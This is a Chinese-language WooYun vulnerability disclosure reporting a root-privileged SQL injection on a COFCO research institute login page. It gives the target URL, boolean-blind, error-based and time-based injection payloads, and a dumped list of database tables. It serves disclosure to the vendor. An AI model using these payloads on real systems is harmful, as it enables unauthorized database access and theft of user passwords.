乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经确认,细节仅向厂商公开 2015-08-13: 细节向核心白帽子及相关领域专家公开 2015-08-23: 细节向普通白帽子公开 2015-09-02: 细节向实习白帽子公开 2015-09-17: 细节向公众公开
rt
中粮营养健康研究院存在root权限sql注入漏洞,可脱库获取大量用户和密码相关的敏感信息
注入地址:http://c3.cofco.com/online_check.php?uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988注入点为:app
Parameter: app (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' AND 9435=9435 AND 'pqLB'='pqLB Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(3794=3794,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'snyA'='snyA Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT * FROM (SELECT(SLEEP(5)))Xddd) AND 'WjQq'='WjQq
注入是root用户dba权限
跑出了用户的密码
跑了一下dbs
当前库为:project_cofco库内有181个表
+------------------------------+| qm_activity || qm_activity_category || qm_activity_dimensions || qm_activity_dimensions_score || qm_activity_expert_score || qm_activity_user_link || qm_activity_user_rater_link || qm_app || qm_app_tag || qm_atme || qm_attach || qm_birthday_count || qm_blog || qm_blog_category || qm_blog_view_temp || qm_blogger || qm_calendar || qm_calendar_big_event || qm_calendar_big_event_url || qm_calendar_collection || qm_calendar_event || qm_calendar_setcache || qm_calendar_share || qm_calendar_story || qm_clean_cache || qm_collection || qm_comment || qm_contact_user || qm_credit_node || qm_credit_user || qm_denounce || qm_department || qm_device_token || qm_expert_action || qm_expert_action_dimensions || qm_expert_action_rater_link || qm_expert_action_user_link || qm_expert_category || qm_expert_category_link || qm_expert_dimensions || qm_expert_score || qm_expression || qm_feed || qm_feed_data || qm_feed_node || qm_feedback || qm_feedback_type || qm_holidays || qm_interface_log || qm_invite_code || qm_invite_record || qm_ioffice_leave || qm_ioffice_leave_count || qm_ioffice_leave_uid_link || qm_ioffice_log || qm_ioffice_user_days || qm_ioffice_user_log || qm_lang || qm_log_comment || qm_login || qm_login_record || qm_manage_user || qm_medal || qm_message_content || qm_message_list || qm_message_member || qm_navi || qm_news || qm_news_category || qm_news_category_user_link || qm_news_log || qm_notice_pushlist || qm_notify_email || qm_notify_email_list || qm_notify_message || qm_notify_node || qm_oauth_token || qm_online || qm_online_logs || qm_online_logs_bak || qm_online_stats || qm_open_notify || qm_open_weibo_login || qm_permission_group || qm_permission_node || qm_portal_channel || qm_portal_node || qm_portal_page || qm_present || qm_present_record || qm_profile_bookmaking || qm_profile_confraternity || qm_profile_education || qm_profile_profession || qm_profile_work || qm_province_city || qm_recent_view || qm_resource || qm_resource_attr || qm_resource_member || qm_resource_order || qm_resource_order_user || qm_resource_user_star || qm_schedule || qm_search || qm_search_key || qm_search_select || qm_share_record || qm_sina || qm_subject || qm_subject_part || qm_subject_province || qm_summary_info || qm_system_data || qm_tag || qm_task || qm_task_log || qm_team || qm_team_album || qm_team_article || qm_team_attach || qm_team_category || qm_team_category_link || qm_team_count || qm_team_feed || qm_team_file || qm_team_forum_post || qm_team_forum_topic || qm_team_log || qm_team_member || qm_team_photo || qm_team_plug || qm_team_plug_init || qm_team_plug_mod || qm_team_plug_mod_init || qm_team_theme || qm_team_topic || qm_team_topic_link || qm_team_visit || qm_team_x_category || qm_timeline || qm_tips || qm_topic || qm_topic_highlight || qm_topic_link || qm_url || qm_user || qm_user_app || qm_user_attention || qm_user_blacklist || qm_user_count || qm_user_credit_history || qm_user_data || qm_user_department || qm_user_follow || qm_user_follow_group || qm_user_follow_group_link || qm_user_group || qm_user_group_link || qm_user_medal || qm_user_online || qm_user_privacy || qm_user_profile || qm_user_profile_setting || qm_user_special || qm_user_verify || qm_visit || qm_widget || qm_widget_diy || qm_widget_user || qm_wiki || qm_wiki_category || qm_wiki_category_link || qm_wiki_history || qm_wx || qm_x_article || qm_x_logs || qm_x_logs_2013_10 || qm_x_vote || qm_x_vote_opt || qm_x_vote_user |+------------------------------+
跑了一下qm_user表的数字做了一下验证
做好过滤。
危害等级:高
漏洞Rank:20
确认时间:2015-08-03 18:51
非常感谢您的支持!
暂无